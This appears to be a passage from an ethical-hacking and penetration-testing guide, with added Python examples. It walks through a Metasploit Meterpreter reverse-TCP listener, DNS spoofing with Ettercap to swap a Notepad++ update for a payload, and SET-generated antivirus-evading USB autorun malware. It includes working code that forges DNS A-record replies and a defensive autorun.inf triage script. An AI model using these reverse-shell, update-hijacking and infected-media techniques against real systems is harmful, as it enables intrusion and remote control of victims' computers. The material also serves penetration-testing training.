Ethical Hacking and Penetration Testing Guide


Step 5—Setting up a Listener on Metasploit
Next, we set up a listener in Metasploit that will receive the connections. Enter the following commands:
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.75.144
msf> set LPORT 4444
msf> exploit -j
The first four commands configure the handler to expect a reverse TCP Meterpreter connection on port 4444; "exploit -j" starts it as a background job so the console stays usable. When our agent is executed on the victim's machine, it connects back to our IP address on port 4444 and the handler turns that connection into a Meterpreter session.


Step 6—Performing DNS Spoofing Attacks
We have already discussed how to launch DNS spoofing attacks in detail, so I will only walk through the process briefly here. To perform the DNS spoofing attack, we need to redirect the host from which Notepad++ downloads its updates to our local machine. To do that, we edit the etter.dns file:
root@bt: pico /usr/local/share/ettercap/etter.dns
Here we add a new "A" record that maps notepad-plus.sourceforge.net, the host Notepad++ contacts for updates, to our local IP address (192.168.75.144, the LHOST from Step 5).
Note: We learned that Notepad++ receives updates from notepad-plus.sourceforge.net by entering the "show options" command in the module.
Next, launch the DNS spoofing attack with Ettercap or any other tool. If you are unsure how to do it, refer to the "Network Sniffing" chapter (Chapter 6).
Step 7—We are now ready to attack. As soon as the victim opens Notepad++, it prompts him to update the application. When he clicks "Yes," the "update" it downloads is our payload; it executes, and we get a Meterpreter session on our handler.
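Steps 5 through 7 together are a DNS spoofing attack: the victim's lookup of notepad-plus.sourceforge.net has to be answered with our LHOST before the real answer arrives, which is exactly what the "A" record in etter.dns tells Ettercap's dns_spoof plugin to do. The following Python code is an added example, not from the book or from Ettercap; it shows what such a forged answer looks like on the wire by parsing a single-question DNS query and building an A-record response for any name in a spoof table. The hostname and address come from the text; SPOOF_TABLE, the function names and the sample queries are my own constructions.

```python
"""DNS spoofing in miniature: parse a DNS query and forge an A-record answer."""
import struct

# Hostnames (lowercase, no trailing dot) that should resolve to the attacker.
# Constructed for this example from the host and LHOST used in the text.
SPOOF_TABLE = {"notepad-plus.sourceforge.net": "192.168.75.144"}


def encode_name(name: str) -> bytes:
    """Encode a dotted hostname as length-prefixed DNS labels."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.strip(".").split(".")) + b"\x00"


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Build a standard recursive query (flags 0x0100) with one question (class IN)."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_question(packet: bytes):
    """Return (txid, flags, qname, qtype, qclass, end_offset) for a one-question query."""
    if len(packet) < 12:
        raise ValueError("too short for a DNS header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", packet[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, off = [], 12
    while True:
        if off >= len(packet):
            raise ValueError("truncated name")
        length = packet[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers are not valid in a question name
            raise ValueError("compression pointer in question name")
        if off + length > len(packet):
            raise ValueError("truncated label")
        labels.append(packet[off:off + length].decode("ascii"))
        off += length
    if off + 4 > len(packet):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    # Names are case-insensitive, so normalise before the table lookup.
    return txid, flags, ".".join(labels).lower(), qtype, qclass, off + 4


def spoofed_reply(query: bytes, table=SPOOF_TABLE, ttl: int = 60):
    """Return a forged A-record response for a query in the spoof table, else None."""
    txid, flags, qname, qtype, qclass, qend = parse_question(query)
    if qtype != 1 or qclass != 1:  # only A/IN queries are answered
        return None
    ip = table.get(qname)
    if ip is None:
        return None  # not a target: let the real resolver answer
    # Response flags: QR=1, AA=1, RD copied from the query, RA=1, RCODE=0.
    rflags = 0x8400 | (flags & 0x0100) | 0x0080
    header = struct.pack("!6H", txid, rflags, 1, 1, 0, 0)
    question = query[12:qend]  # echo the question section unchanged
    # Answer RR: name as a pointer to offset 12, TYPE A, CLASS IN, TTL, RDLENGTH 4, RDATA.
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + rdata
    return header + question + answer


def answered_address(reply: bytes) -> str:
    """Read the IPv4 address out of the single answer RR of a reply built above."""
    _txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!6H", reply[:12])
    if ancount != 1:
        raise ValueError("expected exactly one answer")
    return ".".join(str(b) for b in reply[-4:])  # RDATA is the final 4 bytes


if __name__ == "__main__":
    q = build_query(0x1234, "notepad-plus.sourceforge.net")
    print(answered_address(spoofed_reply(q)))           # 192.168.75.144
    print(spoofed_reply(build_query(0x1235, "example.com")))  # None
```

In the real attack the forged reply is sent on the wire from Ettercap's ARP man-in-the-middle position, so the victim accepts it before, or instead of, the genuine resolver's answer. Keep in mind that the redirection only pays off when the updater fetches over plain HTTP and runs what it downloads without checking a signature; an updater that validates a TLS certificate or a package signature would reject the spoofed host.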
Attack Scenario 4: Malware Loaded on USB Sticks
As discussed earlier, this type of attack is useful only when you have physical access to the victim's computer: we load our malicious payload onto a USB stick, and inserting the stick into the computer runs it, which gives us a reverse connection. Note that this attack works only if AutoRun is enabled on the victim's computer; Windows 7 and later, and XP/Vista with the 2011 AutoRun update installed, ignore autorun.inf on USB flash drives, so it applies only to unpatched or deliberately re-enabled systems. So let's begin.


Step 1—From the SET main menu, select the third option, "Infectious Media Generator."
Step 2—From there, select the second option, "Standard Metasploit Executable," which generates an executable together with an autorun.inf file.
Step 3—It will now ask for our reverse IP, which is our LHOST. Enter your LHOST and press "Enter."
Step 4—Next, it will ask for the type of payload we want to use; we will use our favorite Meterpreter reverse TCP payload.
Step 5—Next, it will ask for the type of encoding we want to use to bypass antivirus restrictions. Choose any one you like; the SET author recommends "Backdoor Executable."


Step 6—Finally, it will ask for the port on which to listen for connections; enter any unused port. This is the LPORT the payload connects back to, so the handler must listen on the same port.
We are now done creating our executable. All you need to do is copy it, together with the generated autorun.inf, to a USB stick and plug the stick into the victim's machine. If AutoRun is enabled there, the executable runs automatically and you get a reverse connection.
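The whole scenario rests on a few lines of autorun.inf telling Windows which program to launch when the stick is inserted. The following Python code is an added example, not from the book or from SET; it parses an autorun.inf and reports what the file would launch, which is the check you want both when triaging a USB stick found in the field and when verifying the media you just generated. SAMPLE_AUTORUN is constructed to resemble generated infectious media and is not SET's actual output; the key names it inspects (open, shellexecute, icon, label, UseAutoPlay) are the documented autorun.inf keys, and the function names are my own.

```python
"""Triage an autorun.inf: report what AutoRun would launch from this medium."""
import re

# Keys whose value names a program that AutoRun will launch.
LAUNCH_KEYS = ("open", "shellexecute")
# Extensions treated as directly executable content for triage purposes.
EXEC_EXTENSIONS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif",
                   ".vbs", ".js", ".hta", ".dll")

# Constructed sample resembling infectious media output (not SET's real file).
SAMPLE_AUTORUN = """\ufeff; autorun.inf
[autorun]
open=program.exe
icon=autorun.ico
label=Company Photos
UseAutoPlay=1
"""


def parse_autorun(text: str) -> dict:
    """Parse autorun.inf into a lowercase {key: value} dict.

    Only sections whose name starts with 'autorun' (e.g. [autorun], [autorun.amd64])
    are read; ';' lines are comments; a UTF-8 BOM is tolerated; the first
    occurrence of a key wins, matching INI semantics.
    """
    entries = {}
    in_autorun = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            in_autorun = section.group(1).strip().lower().startswith("autorun")
            continue
        if not in_autorun or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entries.setdefault(key.strip().lower(), value.strip())
    return entries


def launched_program(value: str) -> str:
    """Extract the program path from an open=/shellexecute= value, dropping arguments."""
    value = value.strip()
    if value.startswith('"'):  # quoted path, may contain spaces
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split()[0] if value else ""


def triage_autorun(text: str) -> list:
    """Return human-readable findings describing what this autorun.inf would do."""
    entries = parse_autorun(text)
    findings = []
    for key in LAUNCH_KEYS:
        if key not in entries:
            continue
        program = launched_program(entries[key])
        if program.lower().endswith(EXEC_EXTENSIONS):
            findings.append(f"{key}= launches executable '{program}'")
        elif program:
            findings.append(f"{key}= invokes '{program}' via its file association")
    if entries.get("useautoplay", "0") == "1":
        findings.append("useautoplay=1 requests immediate AutoPlay on insertion")
    if "icon" in entries or "label" in entries:
        findings.append(f"icon/label set: drive presents itself as '{entries.get('label', '')}'")
    return findings


if __name__ == "__main__":
    for finding in triage_autorun(SAMPLE_AUTORUN):
        print(finding)
```

Run it against the text of any autorun.inf; an empty result means the file names nothing to launch. The shellexecute= branch matters because a document path there (for example a PDF) is still executed through its associated handler, so the triage reports it rather than ignoring non-.exe targets.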
